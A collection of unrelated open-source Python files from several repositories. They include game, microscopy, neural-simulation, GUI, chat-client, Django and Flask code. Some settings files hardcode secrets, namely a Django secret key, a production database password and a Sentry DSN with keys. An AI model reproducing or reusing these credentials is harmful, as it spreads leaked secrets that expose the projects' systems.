SubElement(root, 'pair', pair_props)
with open(join(self.game_path, 'game.xml'), 'wb') as xml_file:
xml_file.write(tostring(root))
def def_grid(self, size):
''' create the grid for the play from the pairs information
and shuffles the grid so they always appear in a different
place
'''
psize = (size * size // 2)
logging.debug('Size requested: %d', psize)
self.grid = []
temp1 = []
temp2 = []
i = 0
# shuffle the pairs first to avoid only taking the first ones
# when there are more pairs in the config file then the grid is using
keys = list(self.pairs.keys())
random.shuffle(keys)
for key in keys:
if i < psize:
elem = {}
elem['pairkey'] = str(key)
elem['state'] = '0'
elem['ab'] = 'a'
if self.pairs[key].props.aimg is not None:
elem['img'] = self.pairs[key].props.aimg
if self.pairs[key].props.asnd is not None:
elem['snd'] = self.pairs[key].props.asnd
if self.pairs[key].props.achar is not None:
elem['char'] = self.pairs[key].props.achar
if self.pairs[key].props.aspeak is not None:
elem['speak'] = self.pairs[key].props.aspeak
temp1.append(elem)
elem = {}
elem['pairkey'] = str(key)
elem['state'] = '0'
elem['ab'] = 'b'
if self.pairs[key].props.bimg is not None:
elem['img'] = self.pairs[key].props.bimg
if self.pairs[key].props.bsnd is not None:
elem['snd'] = self.pairs[key].props.bsnd
if self.pairs[key].props.bchar is not None:
elem['char'] = self.pairs[key].props.bchar
if self.pairs[key].props.bspeak is not None:
elem['speak'] = self.pairs[key].props.bspeak
temp2.append(elem)
i += 1
else:
break
numpairs = len(self.pairs)
if numpairs < psize:
logging.debug('Defgrid: Not enough pairs, requested=%s had=%s'
% (psize, numpairs))
self.data['size'] = str(size)
if self.data['divided'] == '1':
random.shuffle(temp1)
random.shuffle(temp2)
if size == 5:
temp1.append({})
temp1.extend(temp2)
else:
temp1.extend(temp2)
random.shuffle(temp1)
if size == 5:
temp1.insert(12, {})
self.grid = temp1
logging.debug('Defgrid: grid( size=%s ): %s'
% (self.data['size'], self.grid))
logging.debug('Defgrid: data: %s', self.data)
def set_data_grid(self, data, grid):
self.data = data
self.grid = grid
def create_temp_directories(self):
temp_img_folder = join(self.temp_folder, 'images')
temp_snd_folder = join(self.temp_folder, 'sounds')
if 'origin' in self.data and self.data['origin'] == 'art4apps':
if not self.modified:
# if was not modified, don't change the temp directtories
return
else:
# we need copy the files used in the game to the new path
if not exists(temp_img_folder):
makedirs(temp_img_folder)
if not exists(temp_snd_folder):
makedirs(temp_snd_folder)
for key in list(self.pairs.keys()):
# all the images exist, but not all the sounds
for img in (self.pairs[key].props.aimg,
self.pairs[key].props.bimg):
if img is not None:
origin_path = join(ART4APPS_IMAGE_PATH, img)
destination_path = join(temp_img_folder, img)
if not os.path.exists(destination_path):
shutil.copyfile(origin_path, destination_path)
logging.error('copy %s to %s', origin_path,
destination_path)
for snd in (self.pairs[key].props.asnd,
self.pairs[key].props.bsnd):
if snd is not None:
origin_path = join(ART4APPS_AUDIO_PATH,
self.data['language'], snd)
destination_path = join(temp_snd_folder, snd)
if os.path.exists(origin_path) and \
not os.path.exists(destination_path):
shutil.copyfile(origin_path, destination_path)
logging.error('copy %s to %s', origin_path,
destination_path)
# Don't look for the images in the art4apps directory
# after this
self.data['origin'] = ''
self.data['pathimg'] = temp_img_folder
self.data['pathsnd'] = temp_snd_folder
if not exists(temp_img_folder):
makedirs(temp_img_folder)
if not exists(temp_snd_folder):
makedirs(temp_snd_folder)
| godiard/memorize-activity | model.py | Python | gpl-2.0 | 18,923 |
# Replaces the ctf values in input star file with the values in a reference star file
import argparse
import os
from star import *
def parse_args():
parser = argparse.ArgumentParser(description="Replaces the ctf values in input star file with the values in a reference star file.")
parser.add_argument('--input', metavar='f1', type=str, nargs=1, required=True, help="particle file whose ctf values will be changed")
parser.add_argument('--reference', metavar='f2', type=str, nargs=1, required=True, help="particle file whose ctf values will be used as a reference")
parser.add_argument('--output', metavar='o', type=str, nargs=1, help="output file name")
return parser.parse_args()
def main(reference_path,input_path):
# parameters that are relevant to the CTF estimation
ctf_params = ['DefocusU','DefocusV','DefocusAngle','CtfFigureOfMerit','SphericalAberration','AmplitudeContrast']
# dictionary of micrograph name to ctf values
# key = micrograph name
# value = ctf values in 4-ple: DefocusU, DefocusV, DefocusAngle, CtfFOM
mic_to_ctf = {}
output = ''
print "Reading in reference CTF estimates"
ref_star = starFromPath(reference_path)
params_to_replace = [ params for params in ctf_params if params in ref_star.lookup ]
for line in ref_star.body:
mic_root = rootname(ref_star.getMic(line))
if mic_root in mic_to_ctf:
continue
else:
mic_to_ctf[mic_root] = ref_star.valuesOf(params_to_replace, line)
print "Reading input file"
input_star = starFromPath(input_path)
output += input_star.textHeader()
fields_to_replace = input_star.numsOf( params_to_replace )
for line in input_star.body:
values = line.split()
mic_root = rootname(input_star.valueOf('MicrographName',line))
for index,field in enumerate(fields_to_replace):
values[field] = mic_to_ctf[mic_root][index] or values[field]
output += makeTabbedLine(values)
return output
if __name__ == '__main__':
args = parse_args()
input_path = args.input[0]
reference_path = args.reference[0]
if args.output:
output_path = args.output[0]
else:
root, ext = os.path.splitext(input_path)
output_path = root + '_replace_ctf' + ext
main(reference_path, input_path)
with open(output_path, 'w') as output_file:
output_file.write(output)
print "Done!"
| KryoEM/relion2 | python/star/replace_ctf.py | Python | gpl-2.0 | 2,295 |
from brian2 import *
import brian2genn
set_device('genn', directory='simple_example_synapses')
#set_device('cpp_standalone')
N = 100
tau = 10*ms
eqs = '''
dV/dt = -V/tau + Iin/tau : 1
Iin : 1
'''
G = NeuronGroup(N, eqs, threshold='V>1', reset='V=0', name='PN')
G.V = rand()
G2 = NeuronGroup(N, eqs, threshold='V>1', reset='V=0', name='LN')
G2.V = 2 * rand()
alpha = 20/ms
beta = 30/ms
S = Synapses(G, G2,
model='''
ds/dt= alpha*(1-s) - beta*s: 1
g: 1
''',
pre='Iin_post+= g',
name='ex_syns')
alpha2 = 40/ms
beta2 = 60/ms
p_post = 1
p_pre = 30
S2 = Synapses(G2, G,
model='''
ds/dt= alpha2*(1-s) - beta2*s: 1
g: 1
''',
pre='Iin_post+= g*p_pre',
post='''
g*= p_post-0.9;
''',
name='inh_syns')
S.connect(i=1, j=5)
S2.connect(i=[1, 2], j=[1, 2])
S.g = 'rand()'
run(100*ms)
| brian-team/brian2genn | examples/simple_example_synapses.py | Python | gpl-2.0 | 971 |
import gtk
import pango
import math
from core.world import TheWorld
class TextEditor(object):
def __init__(self, text):
self.__text = text
self.cursorindex = 0
self.padding = 10.0
self.width = 0.0
self.height = 0.0
self.pixel_width = 0.0
self.pixel_height = 0.0
# create text layout
self.layout = pango.Layout(TheWorld.pango_context)
fontDescription = pango.FontDescription("Monospace 8")
self.layout.set_font_description(fontDescription)
#layout.set_markup(self.text)
self.layout.set_text(text)
# calc text metrics
self.recalc_text_size()
# -- properties
def __get_text(self):
return self.__text
def __set_text(self, text):
self.__text = text
self.layout.set_text(self.__text)
self.recalc_text_size() # recalc text size
text = property(__get_text, __set_text)
def recalc_text_size(self):
(self.pixel_width, self.pixel_height) = self.layout.get_pixel_size() # bogus when called from init() !?
self.width = self.pixel_width / float(TheWorld.width) #+ self.padding * 2
self.height = self.pixel_height / float(TheWorld.height) #+ self.padding
def draw(self, context, x, y):
# figure out scale factor
# TODO - Text should be independant of scale factor
scale_x = 1.0 / self.pixel_width
scale_y = 1.0 / self.pixel_height
# render the text
context.save()
#context.set_source_rgba(0.0, 0.0, 0.0, 1.0)
context.move_to(0.0, 0.0)
context.scale(scale_x, scale_y)
# draw a background for the text
self.draw_background(context, 0.0, 0.0, self.pixel_width, self.pixel_height, 10) # ve vant square rounded corners :-)
context.set_source_rgba(0.0, 0.0, 0.0, 1.0)
context.show_layout(self.layout)
context.restore()
# render cursor
self.draw_cursor(context)
def draw_cursor(self, context):
(strong, weak) = self.layout.get_cursor_pos(self.cursorindex)
(startx, starty, curx, cury) = strong
startx /= pango.SCALE * float(TheWorld.width)
starty /= pango.SCALE * float(TheWorld.height)
curx /= pango.SCALE * float(TheWorld.width)
cury /= pango.SCALE * float(TheWorld.height)
context.set_line_width(0.02)
context.set_source_rgba(0.0, 0.0, 0.0, 1.0)
context.move_to(0.001 + (startx / self.width), starty / self.height)
context.line_to(0.001 + (startx / self.width), (starty + cury) / self.height)
context.stroke()
def draw_background(self, context, x, y, w, h, r):
x -= self.padding
y -= self.padding
w += self.padding * 2.0
h += self.padding * 2.0
# rounded box
context.move_to(x + r, y) # top left
context.line_to(x + w - r, y) # top right
context.arc(x + w - r, y + r, r, math.pi + math.pi / 2.0, 0.0)
context.line_to(x + w, y + h - r) # bottom right
context.arc(x + w - r, y + h - r, r, 0, math.pi / 2.0)
context.line_to(x + r, y + h) # bottom left
context.arc(x + r, y + h - r, r, math.pi / 2.0, math.pi)
context.line_to(x, y + r) # top left
context.arc(x + r, y + r, r, math.pi, math.pi + math.pi / 2.0)
context.set_source_rgba(0.8, 0.8, 1.0, 0.5)
context.fill_preserve()
context.set_line_width(4.0)
context.set_source_rgba(0.2, 0.2, 1.0, 0.9)
context.stroke()
# thought bubble
context.arc(x + w / 1.5, y + h * 1.1, self.pixel_height / 10.0, 0.0, math.pi * 2.0)
context.set_source_rgba(0.8, 0.8, 1.0, 0.5)
context.fill_preserve()
context.set_source_rgba(0.2, 0.2, 1.0, 0.9)
context.stroke()
context.arc(x + w / 1.7, y + h * 1.2, self.pixel_height / 20.0, 0.0, math.pi * 2.0)
context.set_source_rgba(0.8, 0.8, 1.0, 0.5)
context.fill_preserve()
context.set_source_rgba(0.2, 0.2, 1.0, 0.9)
context.stroke()
context.arc(x + w / 1.9, y + h * 1.3, self.pixel_height / 30.0, 0.0, math.pi * 2.0)
context.set_source_rgba(0.8, 0.8, 1.0, 0.5)
context.fill_preserve()
context.set_source_rgba(0.2, 0.2, 1.0, 0.9)
context.stroke()
# -- key handling ---------------------------------------------------------
def do_key_press_event(self, event):
try :
{ gtk.keysyms.BackSpace : self.do_key_press_backspace,
gtk.keysyms.Delete : self.do_key_press_delete,
gtk.keysyms.Home : self.do_key_press_home,
gtk.keysyms.End : self.do_key_press_end,
gtk.keysyms.Left : self.do_key_press_left,
gtk.keysyms.Right : self.do_key_press_right,
gtk.keysyms.Up : self.do_key_press_up,
gtk.keysyms.Down : self.do_key_press_down } [event.keyval]()
except:
pass
if event.string:
left = self.text[ : self.cursorindex]
right = self.text[self.cursorindex : ]
if event.string == "\r":
self.text = left + "\n" + right
else:
self.text = left + event.string + right
self.cursorindex += 1
def do_key_press_backspace(self):
left = self.text[ : self.cursorindex - 1]
right = self.text[self.cursorindex : ]
self.text = left + right
if self.cursorindex > 0:
self.cursorindex -= 1
def do_key_press_delete(self):
left = self.text[ : self.cursorindex]
right = self.text[self.cursorindex + 1 : ]
self.text = left + right
def do_key_press_home(self):
lines = self.text.splitlines ()
loc = 0
line = 0
for i in lines:
loc += len(i) + 1
if loc > self.cursorindex:
self.cursorindex = loc - len(i) - 1
return
line += 1
def do_key_press_end(self):
lines = self.text.splitlines()
loc = 0
line = 0
for i in lines:
loc += len(i) + 1
if loc > self.cursorindex:
self.cursorindex = loc - 1
return
line += 1
def do_key_press_left(self):
if self.cursorindex > 0:
self.cursorindex -= 1
def do_key_press_right(self):
if self.cursorindex < len(self.text):
self.cursorindex += 1
def do_key_press_up(self):
lines = self.text.splitlines()
if len(lines) == 1:
return
loc = 0
line = 0
for i in lines:
loc += len(i) + 1
if loc > self.cursorindex:
loc -= len(i) + 1
line -= 1
break
line += 1
if line == -1:
return
elif line >= len(lines):
self.cursorindex -= len(lines[-1]) + 1
return
dist = self.cursorindex - loc -1
self.cursorindex = loc
if dist < len(lines[line]):
self.cursorindex -= (len(lines[line]) - dist)
else:
self.cursorindex -= 1
def do_key_press_down(self):
lines = self.text.splitlines()
if len(lines) == 1:
return
loc = 0
line = 0
for i in lines:
loc += len(i) + 1
if loc > self.cursorindex:
break
line += 1
if line >= len(lines) - 1:
return
dist = self.cursorindex - (loc - len(lines[line])) + 1
self.cursorindex = loc
if dist > len (lines[line + 1]):
self.cursorindex += len(lines[line + 1])
else:
self.cursorindex += dist
| antoinevg/survival | widgets/texteditor.py | Python | gpl-2.0 | 7,247 |
"""
Django settings for SimpleChat project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '3o-kw!!=*b7o3mz6nmbllne##wiu7m_lzk%9j&p@@(ecsue&f7'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'chat',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'SimpleChat.urls'
WSGI_APPLICATION = 'SimpleChat.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
BASE_URL = "http://192.168.0.60:9000"
try:
from local_settings import *
except ImportError:
pass | jonathanendersby/SimpleChat | SimpleChat/SimpleChat/settings.py | Python | gpl-2.0 | 2,172 |
from .base import *
DEBUG = False
ALLOWED_HOSTS = ['*']
DATABASES = {
'default': {
'ENGINE': 'django.contrib.gis.db.backends.postgis',#'django.db.backends.postgresql_psycopg2',
'NAME': 'bauth',
'USER': 'postgres',
'ADMINUSER':'postgres',
'PASSWORD': 'C7TS*+dp~-9JHwb*7rzP',
'HOST': '127.0.0.1',
'PORT': '',
}
}
# Add raven to the list of installed apps
INSTALLED_APPS = INSTALLED_APPS + (
# ...
'raven.contrib.django.raven_compat',
)
RAVEN_CONFIG = {
'dsn': 'https://5fa65a7464454dcbadff8a7587d1eaa0:205b12d200e24b39b4c586f7df3965ba@app.getsentry.com/29978',
} | kyrelos/bauth | settings/production.py | Python | gpl-2.0 | 640 |
#
# Moisture control - Serial communication widgets
#
# Copyright (c) 2013 Michael Buesch <m@bues.ch>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
from pymoistcontrol.util import *
import os
class SerialOpenDialog(QDialog):
"""Serial port connection dialog."""
def __init__(self, parent):
"""Class constructor."""
QDialog.__init__(self, parent)
self.setLayout(QGridLayout(self))
self.setWindowTitle("Select serial port")
self.portCombo = QComboBox(self)
if os.name.lower() == "posix":
# Unix operating system
# Add all serial devices from /dev to
# the combo box.
devNodes = QDir("/dev").entryInfoList(QDir.System,
QDir.Name)
select = None
for node in devNodes:
name = node.fileName()
if not name.startswith("ttyS") and\
not name.startswith("ttyUSB"):
continue
path = node.filePath()
self.portCombo.addItem(path, path)
if select is None and\
name.startswith("ttyUSB"):
# Select the first ttyUSB by default.
select = self.portCombo.count() - 1
if select is not None:
self.portCombo.setCurrentIndex(select)
elif os.name.lower() in ("nt", "ce"):
# Windows operating system
# Add 8 COM ports to the combo box.
for i in range(8):
port = "COM%d" % (i + 1)
self.portCombo.addItem(port, port)
else:
raise Error("Operating system not supported")
self.layout().addWidget(self.portCombo, 0, 0, 1, 2)
self.okButton = QPushButton("&Ok", self)
self.layout().addWidget(self.okButton, 1, 0)
self.cancelButton = QPushButton("&Cancel", self)
self.layout().addWidget(self.cancelButton, 1, 1)
self.okButton.released.connect(self.accept)
self.cancelButton.released.connect(self.reject)
def getSelectedPort(self):
"""Get the selected port name."""
index = self.portCombo.currentIndex()
if index < 0:
return None
return self.portCombo.itemData(index)
| mbuesch/moistcontrol | host/pymoistcontrol/commwidgets.py | Python | gpl-2.0 | 2,555 |
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
from scrapy.item import Item, Field
class PopularArticlesItem(Item):
# define the fields for your item here like:
# name = Field()
pass
| Davidhw/WikipediaEditScrapingAndAnalysis | scraping_wikipedia_links/popular_articles/popular_articles/items.py | Python | gpl-2.0 | 276 |
#coding:utf-8
from django.shortcuts import render,render_to_response,redirect
from django.core.urlresolvers import reverse
from block.models import Blocks
from models import Article
from django.template import RequestContext
from django.contrib import messages
from django.contrib.auth.decorators import login_required
# Create your views here.
def article_list(request,block_id):
block_id=int(block_id)
block=Blocks.objects.get(id=block_id)
articles=Article.objects.filter(block=block).order_by("-last_update_timestamp")
return render_to_response("articles_list.html",{"articles":articles,"b":block},context_instance=RequestContext(request))
@login_required()
def article_create(request,block_id):
block_id=int(block_id)
block=Blocks.objects.get(id=block_id)
if request.method=="GET":
return render_to_response("article_create.html",{"b":block},context_instance=RequestContext(request))
else:
title=request.POST['title'].strip()
content=request.POST['content'].strip()
if not title or not content:
messages.add_message(request,messages.ERROR,u'标题和内容不能为空!')
return render_to_response("article_create.html",{"b":block,"title":title,"content":content},context_instance=RequestContext(request))
new_article=Article(block=block,title=title,content=content,owner=request.user)
new_article.save()
messages.add_message(request,messages.INFO,u'成功发表文章!')
return redirect(reverse("article_list",args=[block.id,]))
def article_detail(requset,article_id):
article_id=int(article_id)
article=Article.objects.get(id=article_id)
return render_to_response("article_detail.html",{"article":article},context_instance=RequestContext(requset)) | opspenguin/forum_penguin | article/views.py | Python | gpl-2.0 | 1,804 |
from rest_framework import serializers
class MailTestSerializer(serializers.Serializer):
EMAIL_HOST = serializers.CharField(max_length=1024, required=True)
EMAIL_PORT = serializers.IntegerField(default=25)
EMAIL_HOST_USER = serializers.CharField(max_length=1024)
EMAIL_HOST_PASSWORD = serializers.CharField(required=False, allow_blank=True)
EMAIL_FROM = serializers.CharField(required=False, allow_blank=True)
EMAIL_USE_SSL = serializers.BooleanField(default=False)
EMAIL_USE_TLS = serializers.BooleanField(default=False)
class LDAPTestSerializer(serializers.Serializer):
AUTH_LDAP_SERVER_URI = serializers.CharField(max_length=1024)
AUTH_LDAP_BIND_DN = serializers.CharField(max_length=1024, required=False, allow_blank=True)
AUTH_LDAP_BIND_PASSWORD = serializers.CharField(required=False, allow_blank=True)
AUTH_LDAP_SEARCH_OU = serializers.CharField()
AUTH_LDAP_SEARCH_FILTER = serializers.CharField()
AUTH_LDAP_USER_ATTR_MAP = serializers.CharField()
AUTH_LDAP_START_TLS = serializers.BooleanField(required=False)
class LDAPUserSerializer(serializers.Serializer):
id = serializers.CharField()
username = serializers.CharField()
email = serializers.CharField()
existing = serializers.BooleanField(read_only=True)
| eli261/jumpserver | apps/settings/serializers.py | Python | gpl-2.0 | 1,295 |
#!/usr/bin/python2
import os,sys,socket,select
from time import strftime
variables = ['name','tripcode']
servercommands = ["/pm", "/peoplecount"]
def date():
return strftime(".%Y-%m-%d")
def chat_client(inputsocket,data,location):
#initialize radchat client files
if not os.path.exists(location+'/resources/programparts/radchat'): os.makedirs(location+'/resources/programparts/radchat')
if not os.path.exists(location+'/resources/programparts/radchat/logs'): os.makedirs(location+'/resources/programparts/radchat/logs')
if not os.path.exists(location+'/resources/programparts/radchat/settings.txt'):
with open(location+'/resources/programparts/radchat/settings.txt', "a") as settingsfile:
settingsfile.write("")
#introduce variables
name = data[0]
tripcode = data[1]
#if there is a settings file, read it
if os.path.isfile(location + '/resources/programparts/radchat/settings.txt'):
with open(location + '/resources/programparts/radchat/settings.txt') as settingsfile:
for line in settingsfile:
if line.split()[0] == "name":
name = line[5:].replace("\n","")
if line.split()[0] == "tripcode":
tripcode = line[9:].replace("\n", "")
if line.split()[0] == "host":
host = line[5:].replace("\n","")
if line.split()[0] == "port":
port = int(line[5:].replace("\n",""))
s = inputsocket
sys.stdout.write("\n[{}] ".format(name)); sys.stdout.flush()
while 1:
socket_list = [sys.stdin, s]
# Get the list sockets which are readable
ready_to_read,ready_to_write,in_error = select.select(socket_list , [], [])
for sock in ready_to_read:
if sock == s:
# incoming message from remote server, s
data = sock.recv(4096)
if not data :
print '\nDisconnected from chat server'
return
else :
with open(location+'/resources/programparts/radchat/logs/client'+date(), "a") as log:
log.write(data + "\n")
os.system('cls' if os.name == 'nt' else 'tput reset') #cross platform screen clearing. this just in, clears the ENTIRE SHELL
with open(location+'/resources/programparts/radchat/logs/client'+date(), "r") as log:
sys.stdout.write(log.read()) #prints the entire log. alll of it.
sys.stdout.write('\n\n[{}] '.format(name)) # skips to new first line, rewrites name.
sys.stdout.flush()
else :
# user entered a message
message = sys.stdin.readline().replace("\n", "")
if message:
if message[0] == "/" and message.split()[0] not in servercommands:
#that message was a command
if message.split()[0] == "/changename":
name = message[len(message.split()[0])+1:].replace("\n","")
if not name:
name = "Anonymous"
elif message.split()[0] == "/changetripcode":
tripcode = message[len(message.split()[0])+1:].replace("\n","")
elif message.split()[0] == "/exit" or message.split()[0] == "/quit" or message.split()[0] == "/leave":
print "Leaving chat server."
return
elif message.split()[0] == "/help" or message.split()[0] == "/?":
sys.stdout.write("\nThanks for using the radchat client. Here are the commands you currently have available:\n/changename + new name: changes your name\n/changetripcode + new tripcode: changes your trip code.\n/quit OR /leave: exits gracefully\n/help OR /?: Displays this menu.\n")
else:
print "Invalid command"
else:
#format all the data and send it
s.send("{}\n{}\n{}".format(message, name, tripcode))
sys.stdout.write('[{}] '.format(name))
sys.stdout.flush() | Kosinkadink/techtem-network | resources/protocols/radchat.py | Python | gpl-2.0 | 3,558 |
from flask import Blueprint, request, render_template, jsonify
from housesGenerator import House
from holdings import Holdings
houses = Blueprint('houses', __name__, url_prefix='/houses')
@houses.route('/')
def index():
return render_template('houses.html')
@houses.route('/houseGenerator', methods=['GET', 'POST'])
def houseGenerator():
realm = request.args.get('realm')
size = request.args.get('size')
foundation = request.args.get('foundation')
name = request.args.get('name')
house = House.startingResources(realm, size, foundation, name)
from holdings import holdingsData
generatedHouse = Holdings(holdingsData).generateAllHoldings(house, realm)
return jsonify(generatedHouse)
| ondoheer/GOT-Platform | app/houses/views.py | Python | gpl-2.0 | 723 |
#!/usr/bin/env python3
import unittest, sys, findbits
class TestFindBits(unittest.TestCase):
def setUp(self):
self.old_stdout = sys.stdout
sys.stdout = OutputBuffer()
def tearDown(self):
sys.stdout = self.old_stdout
INVERT_CASES = [
('10', '01'),
('', ''),
]
def test_invert(self):
self.commutative_test(findbits.invert, self.INVERT_CASES)
SEARCH_CASES = [
('1111', '10111101', ['Match at bit 2', '0<1111>0']),
('00', '10111101', ['Not found']),
]
def test_search(self):
for target, data, expected_fragments in self.SEARCH_CASES:
sys.stdout.clear_buffer()
findbits.search(target, data)
for fragment in expected_fragments:
self.assertIn(fragment, sys.stdout.content)
BINSTRING_CASES = [
(42, '101010'),
(1, '1'),
(0, ''),
]
def test_binstring(self):
self.unary_operation_test(findbits.binstring, self.BINSTRING_CASES)
REVERSE_CASES = [
('abc', 'cba'),
('', ''),
]
def test_stringreverse(self):
self.commutative_test(findbits.stringreverse, self.REVERSE_CASES)
def commutative_test(self, operation, cases):
self.unary_operation_test(operation, cases)
self.unary_operation_test(operation, map(reversed, cases))
def unary_operation_test(self, operation, cases):
for case_in, case_out in cases:
self.assertEqual(operation(case_in), case_out)
class OutputBuffer(object):
def __init__(self):
self.clear_buffer()
def clear_buffer(self):
self.content = ''
def write(self, data):
self.content += data
if __name__ == '__main__':
unittest.main()
| samyk/proxmark3 | tools/findbits_test.py | Python | gpl-2.0 | 1,837 |
# -*- mode: python; coding: utf-8; -*-
import os
APP_NAME = "SLog"
VERSION = "0.9.4"
WEBSITE = "http://vialinx.org"
LICENSE = """
SLog is a PyGTK-based GUI for the LightLang SL dictionary.
Copyright 2007 Nasyrov Renat <renatn@gmail.com>
This file is part of SLog.
SLog is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
SLog is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
along with SLog; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
INSTALL_PREFIX = "@prefix@"
PIXMAP_DIR = os.path.join(INSTALL_PREFIX, "share", "pixmaps")
LOCALE_DIR = os.path.join(INSTALL_PREFIX, "share", "locale")
DATA_DIR = os.path.join(INSTALL_PREFIX, "share", "slog")
LOGO_ICON = "slog.png"
LOGO_ICON_SPY = "slog_spy.png"
#FTP_LL_URL = "ftp://ftp.lightlang.org.ru/dicts"
FTP_LL_URL = "ftp://etc.edu.ru/pub/soft/for_linux/lightlang"
FTP_DICTS_URL = FTP_LL_URL + "/dicts"
FTP_REPO_URL = FTP_DICTS_URL + "/repodata/primary.xml"
REPO_FILE = os.path.expanduser("~/.config/slog/primary.xml")
SL_TMP_DIR = "/tmp/sl"
def get_icon(filename):
return os.path.join(PIXMAP_DIR, filename)
| mdevaev/slog | src/common.py | Python | gpl-2.0 | 1,483 |
#!/usr/bin/env python3
#
import sys
import csv
from pprint import pprint
"""2018.10.28 John Dey
consume CSV output from pwalk and reassemble directory data.
File system data from pwalk is flattened and out of order.
Rewalk the tree data and create two new fields for each directory.
Create a tree sum of file count and bytes at each directory (node)
that represents the child nodes. Sums for the root will
become the total file count and sum size for every file.
Notes: I wrote this in Python as a proof of concept.
"""
def usage():
"""how to use and exit"""
print("usage: % inputfile.csv" % sys.argv[0])
sys.exit(1)
if len(sys.argv ) != 2:
usage()
dd = {}
with open(sys.argv[1], newline='') as csvfile:
pwalk = csv.reader(csvfile, delimiter=',', quotechar='"')
for row in pwalk:
if int(row[15]) >= 0: # only store directories
dd[int(row[0])] = {'parent': int(row[1]),
'depth': int(row[2]),
'dircnt': int(row[15]),
'sumcnt': int(row[15]), # or Zero?
'dirsiz': int(row[16]),
'sumsiz': int(row[16])}
if int(row[1]) == 0:
root = int(row[0])
dd[int(row[0])]['sumcnt'] += 1
dd[int(row[0])]['sumsiz'] += int(row[7])
print("Total directories: %d" % len(dd.keys()))
"""reassemble the tree"""
for inode in dd.keys():
parent = dd[inode]['parent']
while parent != 0:
dd[parent]['sumcnt'] += dd[inode]['dircnt']
dd[parent]['sumsiz'] += dd[inode]['dirsiz']
parent = dd[parent]['parent']
pprint(dd[root])
| fizwit/filesystem-reporting-tools | reassemble.py | Python | gpl-2.0 | 1,682 |
from http.server import SimpleHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
import threading
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
if __name__ == '__main__':
server = ThreadedHTTPServer(('localhost', 8000), SimpleHTTPRequestHandler)
print( 'Starting server, use <Ctrl-C> to stop')
server.serve_forever()
| jesah/leaflet_webgl | webserver.py | Python | gpl-2.0 | 407 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright (C) 2005-2008 Francisco José Rodríguez Bogado, #
# Diego Muñoz Escalante. #
# (pacoqueen@users.sourceforge.net, escalant3@users.sourceforge.net) #
# #
# This file is part of GeotexInn. #
# #
# GeotexInn is free software; you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 2 of the License, or #
# (at your option) any later version. #
# #
# GeotexInn is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with GeotexInn; if not, write to the Free Software #
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA #
###############################################################################
###################################################################
## confirmings.py - Gestión de confirmings recibidos.
###################################################################
## NOTAS:
##
## ----------------------------------------------------------------
## TODO:
## Los confirmings (según pclases) se marcan automáticamente como
## cobrados al pasar la fecha de vencimiento, pero para ello hay
## que llamar a esta_pendiente. Habría que hacer un proceso
## automático en el lado del servidor que actualizara los
## confirmings sin intervención del usuario.
###################################################################
## Changelog:
## 21 de noviembre de 2008 -> Inicio
##
###################################################################
from ventana import Ventana
from formularios import utils
import pygtk
pygtk.require('2.0')
import gtk
from framework import pclases
from utils import _float as float
import mx.DateTime
class Confirmings(Ventana):
def __init__(self, objeto = None, usuario = None):
"""
Constructor. objeto puede ser un objeto de pclases con el que
comenzar la ventana (en lugar del primero de la tabla, que es
el que se muestra por defecto).
"""
self.usuario = usuario
Ventana.__init__(self, 'confirmings.glade', objeto, usuario)
connections = {'b_salir/clicked': self.salir,
